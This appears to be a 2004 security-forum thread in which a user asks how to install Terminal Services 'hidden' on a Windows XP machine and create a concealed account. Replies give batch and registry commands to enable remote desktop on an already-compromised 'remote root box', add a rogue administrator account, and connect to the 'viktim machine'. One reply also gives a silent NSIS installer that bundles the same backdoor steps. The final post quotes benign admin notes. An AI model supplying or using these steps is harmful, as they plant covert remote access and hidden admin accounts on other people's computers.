Government Security
Network Security Resources

Photo

Installing Terminal Server On Windows Xp?

• Please log in to reply
8 replies to this topic

#1 x1`

x1`

Staff Sergeant

• Members
  • 412 posts

Posted 30 August 2004 - 10:56 AM

how do i install terminal server on a windows xp mahcine hidden , also i wanting to know how to make a new account and hide it so it dosent apear ..thanks

#2 dmg

dmg

Corporal

• Members
  • 156 posts

Posted 30 August 2004 - 12:17 PM

WindowsXP Pro has Terminal Services out-of-the-box.... Just have to enable it. Only backdraw is only one user can connect to the desktop at a time. I haven't found a way to change that yet.

#3 x1`

x1`

Staff Sergeant

• Members
  • 412 posts

Posted 30 August 2004 - 01:36 PM

dmg it would of been nice if you put in your reply how to enable it?

#4 GAN_GR33N

GAN_GR33N

Corporal

• Members
  • 163 posts

Posted 30 August 2004 - 02:20 PM

i'm not sure but i think you go to the control panel > add & remove programs > windows component tab> check the box for terminal services > ok then restart.

not sure but i think thats it

good luck

#5 passi

passi

Staff Sergeant

• Members
  • 301 posts

Posted 31 August 2004 - 10:25 AM

When the TS component is installed, but DISABLED (in most cases) you can enable it (in windows XP):
Rightclick on My Computer -> Properties -> Remote -> Check the 2nd box

When you have a (remote) root box on a windows machine you can enable terminal services:

1) type "ver" and determinate this box uses windows xp. i just tested this on windows xp, when it works on other os's too, let me know.

2) Run these commands on the remote machine (you can copy into a .bat file and upload it, too of course):

echo Windows Registry Editor Version 5.00 >> ts_on.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Terminal Server]>> ts_on.reg
echo "TSEnabled"=dword:00000001 >> ts_on.reg
echo "TSUserEnabled"=dword:00000001 >> ts_on.reg
echo "fAllowToGetHelp"=dword:00000001 >> ts_on.reg
echo "fDenyTSConnections"=dword:00000000 >> ts_on.reg
regedit.exe /s "ts_on.reg"
del /f ts_on.reg

3) Run the 'ts_on.bat'. Remote desktop should be enabled.

4) Optional: If you want to add a user with admin privileges to use with ts, you can do this by doing the following:

a) type "net localgroup" to find out how the adminstrative group is called on this system (needed because on different languages of win xp "adminstator" is typed in another way.)
B) type "net user peter pan /add" to add a user. Username now is 'peter' and password is 'pan'.
c)type "net localgroup Administrators peter /Add" to add user 'peter' to the admin group. Remember: Replace "Administrators" by the name found out in step a.

Now you can connect to the viktim machine. (Start -> Run -> "mstsc"). Check the settings and connect.

You wonder why I wrote that much? The answer is spimple - i was bored :)

#6 droplogic66

droplogic66

Private

• Members
  • 13 posts

Posted 31 August 2004 - 07:00 PM

Got this off a post about a year ago from this site. Not sure if it's any diff than the previous post tho, maybe it'll help.

Need 4 files.

bootlog.txt with the following in it:

[Components] 
TSEnabled = on 

sysocmgr.exe (couldn't find a link)

TS.bat with the following in it:

@Echo Off
regedit /s TS.reg
sysocmgr /i:%windir%\inf\sysoc.inf /u:bootlog.txt /q
net user <new username> <new password> /add
net localgroup Administrators /add <new username>
Exit

and TS.reg with the following in it:

Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]
"Start"=dword:00000002
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
"EnableAdminTSRemote"=dword:00000001
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
"TSEnabled"=dword:00000001
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD]
"Start"=dword:00000002

You could also throw it all together with nsis or something like that. Somethin simple like this should work.

Name "Install"
SilentInstall silent
ShowInstDetails nevershow
OutFile "TS.exe"

Section

SetOutPath "$WINDIR\System32"
File "bootlog.txt"
File "sysocmgr.exe"
WriteRegDWORD HKLM "System\CurrentControlSet\Services\TermService" "Start" 00000002
WriteRegDWORD HKLM "Software\Policies\Microsoft\Windows\Installer" "EnableAdminTSRemote" 00000001
WriteRegDWORD HKLM "System\CurrentControlSet\Control\Terminal Server" "TSEnabled" 00000001
WriteRegDWORD HKLM "System\CurrentControlSet\Services\TermDD" "Start" 00000002
Exec "$WINDIR\System32\sysocmgr.exe /i:$WINDIR\inf\sysoc.inf /u:bootlog.txt /q"
Exec "net user <username> <password> /add"
Exec "net localgroup Administrators /add <username>
Exec "net start termserv"

SectionEnd

Good luck. Hope this helps.

#7 x1`

x1`

Staff Sergeant

• Members
  • 412 posts

Posted 01 September 2004 - 04:48 PM

ok it says ...the person is using the computer if you want to disconect them , press yes to continue ...i want it to be at the same time as them

#8 nackas

nackas

Private First Class

• Members
  • 48 posts

Posted 01 September 2004 - 09:40 PM

ok it says ...the person is using the computer if you want to disconect them , press yes to continue ...i want it to be at the same time as them

You can't. Terminal Services doesn't allow multiple logins. I think your better option is something like Dameware or RealVNC.

#9 Guest_Paul_*

Guest_Paul_*
  • Guests

Posted 02 September 2004 - 03:02 AM

google results:

Command Line Install of Terminal Services

You can indeed install Terminal Services from the commandline; and there are a few reasons why you might want to do such a thing.

It can be faster and lower-maintenance if you have the command line handy.
If you've screwed up and forgotten to add TS to a server that needs it and is now five hundred miles away, you can possibly give someone a command to run; much easier than a GUI walkthrough
Same scenario, but if you have remote console access of some kind (such as telnet) then you can do it yourself.
The technique involves careful use of rundll32's INF file install ability, the TSOC.INF file, and correct section calls.

Possible Problems with Command Line Install
It's not perfect; here are a few things to remember:

You need to reboot after installing Terminal Services.
The system needs to copy source files.  Make sure it has them available and knows where they are if you don't have GUI access.
Terminal Services will NOT show up as installed in Windows Components if you install it this way.
Here's the rundll32 command to install Windows 2000 Terminal Services in Remote Admin mode:

%SystemRoot%\System32\rundll32.exe setupapi,InstallHinfSection TerminalServices.FreshInstall 128 %SystemRoot%\inf\tsoc.inf

Enabling Remote Desktop, remotely

Let's say you're in a situation where you can't log into your XP machine because you forgot to click that checkbox. psexec to the rescue!

psexec \\machinename reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0

I shouldn't have to say that this isn't in any way supported, or that it's not going to work if you're not already an admin on the machine that has RD access, or that a firewall will get in the way, or that there may be better ways to do it using script or WMI, but I've found it useful on a couple occasions.

0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users